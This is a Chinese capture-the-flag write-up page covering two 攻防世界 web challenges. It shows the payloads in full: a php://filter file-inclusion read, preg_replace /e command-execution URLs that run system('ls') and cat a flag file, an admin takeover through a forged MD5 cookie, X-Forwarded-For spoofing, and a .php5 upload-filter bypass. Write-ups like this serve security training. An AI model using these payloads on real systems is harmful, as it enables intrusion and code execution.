ics-05-攻防世界

链接:http://111.198.29.45:50775
考点:文件包含漏洞、preg_replace()函数/e漏洞
1、点击左侧栏,存在index.php页面,查看源代码发现herf=?page=index,判断存在文件包含漏洞。
LFI漏洞的黑盒判断方法:单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。
利用?page=php://filter/read=convert.base64-encode/resource=index.php得到base64:

PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwoKQHNlc3Npb25fc3RhcnQoKTsKcG9zaXhfc2V0dWlkKDEwMDApOwoKCj8+CjwhRE9DVFlQRSBIVE1MPgo8aHRtbD4KCjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgogICAgPG1ldGEgbmFtZT0icmVuZGVyZXIiIGNvbnRlbnQ9IndlYmtpdCI+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPWVkZ2UsY2hyb21lPTEiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLCBtYXhpbXVtLXNjYWxlPTEiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJsYXl1aS9jc3MvbGF5dWkuY3NzIiBtZWRpYT0iYWxsIj4KICAgIDx0aXRsZT7orr7lpIfnu7TmiqTkuK3lv4M8L3RpdGxlPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDx1bCBjbGFzcz0ibGF5dWktbmF2Ij4KICAgICAgICA8bGkgY2xhc3M9ImxheXVpLW5hdi1pdGVtIGxheXVpLXRoaXMiPjxhIGhyZWY9Ij9wYWdlPWluZGV4Ij7kupHlubPlj7Dorr7lpIfnu7TmiqTkuK3lv4M8L2E+PC9saT4KICAgIDwvdWw+CiAgICA8ZmllbGRzZXQgY2xhc3M9ImxheXVpLWVsZW0tZmllbGQgbGF5dWktZmllbGQtdGl0bGUiIHN0eWxlPSJtYXJnaW4tdG9wOiAzMHB4OyI+CiAgICAgICAgPGxlZ2VuZD7orr7lpIfliJfooag8L2xlZ2VuZD4KICAgIDwvZmllbGRzZXQ+CiAgICA8dGFibGUgY2xhc3M9ImxheXVpLWhpZGUiIGlkPSJ0ZXN0Ij48L3RhYmxlPgogICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2h0bWwiIGlkPSJzd2l0Y2hUcGwiPgogICAgICAgIDwhLS0g6L+Z6YeM55qEIGNoZWNrZWQg55qE54q25oCB5Y+q5piv5ryU56S6IC0tPgogICAgICAgIDxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ic2V4IiB2YWx1ZT0ie3tkLmlkfX0iIGxheS1za2luPSJzd2l0Y2giIGxheS10ZXh0PSLlvIB85YWzIiBsYXktZmlsdGVyPSJjaGVja0RlbW8iIHt7IGQuaWQ9PTEgMDAwMyA/ICdjaGVja2VkJyA6ICcnIH19PgogICAgPC9zY3JpcHQ+CiAgICA8c2NyaXB0IHNyYz0ibGF5dWkvbGF5dWkuanMiIGNoYXJzZXQ9InV0Zi04Ij48L3NjcmlwdD4KICAgIDxzY3JpcHQ+CiAgICBsYXl1aS51c2UoJ3RhYmxlJywgZnVuY3Rpb24oKSB7CiAgICAgICAgdmFyIHRhYmxlID0gbGF5dWkudGFibGUsCiAgICAgICAgICAgIGZvcm0gPSBsYXl1aS5mb3JtOwoKICAgICAgICB0YWJsZS5yZW5kZXIoewogICAgICAgICAgICBlbGVtOiAnI3Rlc3QnLAogICAgICAgICAgICB1cmw6ICcvc29tcnRoaW5nLmpzb24nLAogICAgICAgICAgICBjZWxsTWluV2lkdGg6IDgwLAogICAgICAgICAgICBjb2xzOiBbCiAgICAgICAgICAgICAgICBbCiAgICAgICAgICAgICAgICAgICAgeyB0eXBlOiAnbnVtYmVycycgfSwKICAgICAgICAgICAgICAgICAgICAgeyB0eXBlOiAnY2hlY2tib3gnIH0sCiAgICAgICAgICAgICAgICAgICAgIHsgZmllbGQ6ICdpZCcsIHRpdGxlOiAnSUQnLCB3aWR0aDogMTAwLCB1bnJlc2l6ZTogdHJ1ZSwgc29ydDogdHJ1ZSB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnbmFtZScsIHRpdGxlOiAn6K6+5aSH5ZCNJywgdGVtcGxldDogJyNuYW1lVHBsJyB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnYXJlYScsIHRpdGxlOiAn5Yy65Z+fJyB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnc3RhdHVzJywgdGl0bGU6ICfnu7TmiqTnirbmgIEnLCBtaW5XaWR0aDogMTIwLCBzb3J0OiB0cnVlIH0sCiAgICAgICAgICAgICAgICAgICAgIHsgZmllbGQ6ICdjaGVjaycsIHRpdGxlOiAn6K6+5aSH5byA5YWzJywgd2lkdGg6IDg1LCB0ZW1wbGV0OiAnI3N3aXRjaFRwbCcsIHVucmVzaXplOiB0cnVlIH0KICAgICAgICAgICAgICAgIF0KICAgICAgICAgICAgXSwKICAgICAgICAgICAgcGFnZTogdHJ1ZQogICAgICAgIH0pOwogICAgfSk7CiAgICA8L3NjcmlwdD4KICAgIDxzY3JpcHQ+CiAgICBsYXl1aS51c2UoJ2VsZW1lbnQnLCBmdW5jdGlvbigpIHsKICAgICAgICB2YXIgZWxlbWVudCA9IGxheXVpLmVsZW1lbnQ7IC8v5a+86Iiq55qEaG92ZXLmlYjmnpzjgIHkuoznuqfoj5zljZXnrYnlip/og73vvIzpnIDopoHkvp3otZZlbGVtZW505qih5Z2XCiAgICAgICAgLy/nm5HlkKzlr7zoiKrngrnlh7sKICAgICAgICBlbGVtZW50Lm9uKCduYXYoZGVtbyknLCBmdW5jdGlvbihlbGVtKSB7CiAgICAgICAgICAgIC8vY29uc29sZS5sb2coZWxlbSkKICAgICAgICAgICAgbGF5ZXIubXNnKGVsZW0udGV4dCgpKTsKICAgICAgICB9KTsKICAgIH0pOwogICAgPC9zY3JpcHQ+Cgo8P3BocAoKJHBhZ2UgPSAkX0dFVFtwYWdlXTsKCmlmIChpc3NldCgkcGFnZSkpIHsKCgoKaWYgKGN0eXBlX2FsbnVtKCRwYWdlKSkgewo/PgoKICAgIDxiciAvPjxiciAvPjxiciAvPjxiciAvPgogICAgPGRpdiBzdHlsZT0idGV4dC1hbGlnbjpjZW50ZXIiPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj48P3BocCBlY2hvICRwYWdlOyBkaWUoKTs/PjwvcD4KICAgIDxiciAvPjxiciAvPjxiciAvPjxiciAvPgoKPD9waHAKCn1lbHNlewoKPz4KICAgICAgICA8YnIgLz48YnIgLz48YnIgLz48YnIgLz4KICAgICAgICA8ZGl2IHN0eWxlPSJ0ZXh0LWFsaWduOmNlbnRlciI+CiAgICAgICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgICAgICAgIDw/cGhwCgogICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkcGFnZSwgJ2lucHV0JykgPiAwKSB7CiAgICAgICAgICAgICAgICAgICAgZGllKCk7CiAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkcGFnZSwgJ3RhOnRleHQnKSA+IDApIHsKICAgICAgICAgICAgICAgICAgICBkaWUoKTsKICAgICAgICAgICAgICAgIH0KCiAgICAgICAgICAgICAgICBpZiAoc3RycG9zKCRwYWdlLCAndGV4dCcpID4gMCkgewogICAgICAgICAgICAgICAgICAgIGRpZSgpOwogICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgIGlmICgkcGFnZSA9PT0gJ2luZGV4LnBocCcpIHsKICAgICAgICAgICAgICAgICAgICBkaWUoJ09rJyk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgaW5jbHVkZSgkcGFnZSk7CiAgICAgICAgICAgICAgICAgICAgZGllKCk7CiAgICAgICAgICAgICAgICA/PgogICAgICAgIDwvcD4KICAgICAgICA8YnIgLz48YnIgLz48YnIgLz48YnIgLz4KCjw/cGhwCn19CgoKLy/mlrnkvr/nmoTlrp7njrDovpPlhaXovpPlh7rnmoTlip/og70s5q2j5Zyo5byA5Y+R5Lit55qE5Yqf6IO977yM5Y+q6IO95YaF6YOo5Lq65ZGY5rWL6K+VCgppZiAoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10gPT09ICcxMjcuMC4wLjEnKSB7CgogICAgZWNobyAiPGJyID5XZWxjb21lIE15IEFkbWluICEgPGJyID4iOwoKICAgICRwYXR0ZXJuID0gJF9HRVRbcGF0XTsKICAgICRyZXBsYWNlbWVudCA9ICRfR0VUW3JlcF07CiAgICAkc3ViamVjdCA9ICRfR0VUW3N1Yl07CgogICAgaWYgKGlzc2V0KCRwYXR0ZXJuKSAmJiBpc3NldCgkcmVwbGFjZW1lbnQpICYmIGlzc2V0KCRzdWJqZWN0KSkgewogICAgICAgIHByZWdfcmVwbGFjZSgkcGF0dGVybiwgJHJlcGxhY2VtZW50LCAkc3ViamVjdCk7CiAgICB9ZWxzZXsKICAgICAgICBkaWUoKTsKICAgIH0KCn0KCgoKCgo/PgoKPC9ib2R5PgoKPC9odG1sPgo=

解密得到php代码,提取关键代码:

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {echo "<br >Welcome My Admin ! <br >";$pattern = $_GET[pat];$replacement = $_GET[rep];$subject = $_GET[sub];if (isset($pattern) && isset($replacement) && isset($subject)) {preg_replace($pattern, $replacement, $subject);}else{die();}
}

2、从上面代码知道,在考preg_replace()关于/e执行代码的漏洞,参考https://www.cnblogs.com/mengdejun/p/3926704.html,可构造语句进行渗透:
http://111.198.29.45:50775/index.php?pat=/test/e&rep=system('ls')&sub=test可以得到目录:

s3chahahaDir可疑,下一步进该目录查看
http://111.198.29.45:50775/index.php?pat=/test/e&rep=system('cd s3chahahaDir%26%26+ls')&sub=test得到目录flag
http://111.198.29.45:50775/index.php?pat=/test/e&rep=system('cd s3chahahaDir/flag%26%26+ls')&sub=test发现文件flag.php
http://111.198.29.45:50775/index.php?pat=/test/e&rep=system('cat s3chahahaDir/flag/flag.php')&sub=test返回页面空白,查看源代码发现flag。

bug-攻防世界

链接:http://111.198.29.45:50972/index.php?module=login
考点:越权、IP伪造、上传绕过
1、打开题目之后,注册并登陆自己的用户,我们可以看到登陆页面有找回密码的选项,登陆之后有更改密码的选项,这些都是通过自己的用户越权获取admin权限的可以测试的地方。
2、利用bp截获Chang Pwd页面的web请求,发现user的cookie,应该是自己用户的MD5,测试发现是uid:username的MD5值,那么我们便可以利用1:admin的MD5值测试绕过越权,并成功。(注意url里的uid=1,并且直接对获取的包更改后forward,页面返回还是自己的信息,而在repeater里得到的是admin的信息。)
3、通过响应的内容,我们发现了admin的关键信息,可以拿去更改admin的密码,成功越权。
4、之前点击manage页面总是提示权限不够,其中应该有关键信息,再去看看,发现IP受限制,进行IP伪造,推荐使用火狐插件Header Editor,伪造x-forward-for:127.0.0.1成功绕过。然后看到了一个欢快的笑脸?,真是一山放过一山拦…
5、查看源代码发现:

柳暗花明又一村,filemanage说明???应该是upload,构造url:
http://111.198.29.45:50972/index.php?module=filemanage&do=upload
获取文件上传的页面,然后用我之前制作的图片马试一下,被人家过滤了…
多次测试发现上传jpg/png提示you know what i want… 鬼哦…
肯定是要php的,但是上传php又提示这是一个php文件,很烦…
参考官方的wp,用后缀php5,图片里用标签<script language="php">xxx;</script>,即可绕过,记得更改Content-Type: image/jpeg。在bp里即可得到flag。
菜鸡太难了…

攻防世界WEB题目解析相关推荐

  1. 攻防世界——WEB题目Ikun_BILIBILI

    BUUCTF 刷题ikun_bilibili应援团(JWT伪造.python反序列化) 一.获取lv6账号位置 import requests target = "http://111.20 ...

  2. 攻防世界web进阶区ics-05详解

    攻防世界web进阶区ics-05详解 题目 解法 preg_replace ctype_alnum strpos X-Forwarded-For 题目 我们只能点击一个地方 解法 御剑扫描有一个css ...

  3. 攻防世界-web高手进阶区

    文章目录 攻防世界-web高手进阶区 1.baby_web 2.Training-WWW-Robots 3.Web_php_include (文件包含+伪协议) 1.方法 2.方法 4.ics-06( ...

  4. 攻防世界(web篇)---supersqli

    文章目录 攻防世界(web篇)---supersqli 拿到题目后,发现是单引号报错字符型注入 order by 2的时候页面正常回显,order by 3的时候页面出错 接下来union查询,发现被 ...

  5. 攻防世界web进阶区wtf.sh-150详解

    攻防世界web进阶区wtf.sh-150详解 题目 详解 题目 看起来像一个论坛,可以注册,登录 详解 我们随便打开一个 尝试注入 并没有发现可以注入 注册发现,admin已经存在, 我们看看能不能二 ...

  6. 攻防世界web新手区(来自小白)*-*

    鄙人是个纯纯的小白,这个博客也是给小白写的,不过大佬们也不会来查这些题的wp吧 拍飞 文章目录 攻防世界WEB新手区(1--11) 第一题view_source 第二题robots 第三题backup ...

  7. 攻防世界 web高手进阶区 9分题 favorite_number

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...

  8. 攻防世界——web新手题

    攻防世界----web新手题 1. robots 打开题目场景,发现与robots协议有关,上网搜索robots协议的内容: Robots协议(也称为爬虫协议.机器人协议等)的全称是"网络爬 ...

  9. 攻防世界Web题 - unseping 总结

    攻防世界Web题 - unseping 总结 1.审题 进入题目,可以看出来是典型的php反序列化题目. 2.源代码分析 <?php highlight_file(__FILE__); //显示 ...

最新文章

  1. c++ vector iterator
  2. Left 4 Dead升级补丁总汇(3663-3986)
  3. 如何使用Node.js,Express和MongoDB设置GraphQL服务器
  4. 本地套接字示例[来源:Advanced Linux Programming]
  5. error gyp ERR! stack Error: Could not find any Visual Studio installation to use
  6. BaiduMapsApiDemo报错:请在 DemoApplication.java文件输入正确的授权Key
  7. 液晶 mura 机器视觉 matlab,基于Gabor滤波与C-V模型分割的LCDMura缺陷机器视觉检测方法...
  8. android audiorecord jni,Android AudioRecord初始化失败
  9. 香港科技大学工学院理学硕士土木基建工程及管理(MSc CIEM)2022Fall宣讲会(线上)
  10. 在三维坐标中给出三个点,求三个点所在平面的圆心和圆心坐标
  11. 2019PASS发布以来第一次更新,快点击查看!
  12. Excel2016保存文件闪退(在安装了Visio后)
  13. 视觉工程师:工业相机50问
  14. VS2013 OpenCV 2.4.9 “HEAP:Invalid Address specified to RtlValidateHeap( 000D0000, 019FEF18 )” 错误
  15. 12.2 关闭DLM 自动收集统计信息 (SCM0)ORA-00600之[ksliwat: bad wait time]
  16. electron主进程和渲染进程的通讯
  17. `inlineCollapsed` not control Menu under Sider. Should set `collapsed` on Sider instead.
  18. c++生成so调用LOGI
  19. 教你如何解决网络所面临的安全问题?
  20. 细谈get、post区别

热门文章

  1. LaTex插入eps或pdf(或svg)以及去除eps、pdf白边
  2. java nio servlet_java nio http服务器(3)简单的Servlet容器
  3. 面试官:谈谈Spring中用到了哪些设计模式?
  4. python中not加变量是_Python3基础 in 与 not in 判断一个变量是否在列表中存在
  5. ffmpeg-avi转mp4命令,顺带记一次遇到的问题
  6. 福建瑞芯微电子实习第二天
  7. 学生用计算机的额定功率,电脑电源额定功率要多少才合适?
  8. python如何换背景_python实现抠图给证件照换背景源码
  9. PCB生成丝印图纸(PDF)
  10. c语言大小写字母转换if,C语言实现 对文件中大小写字母的转换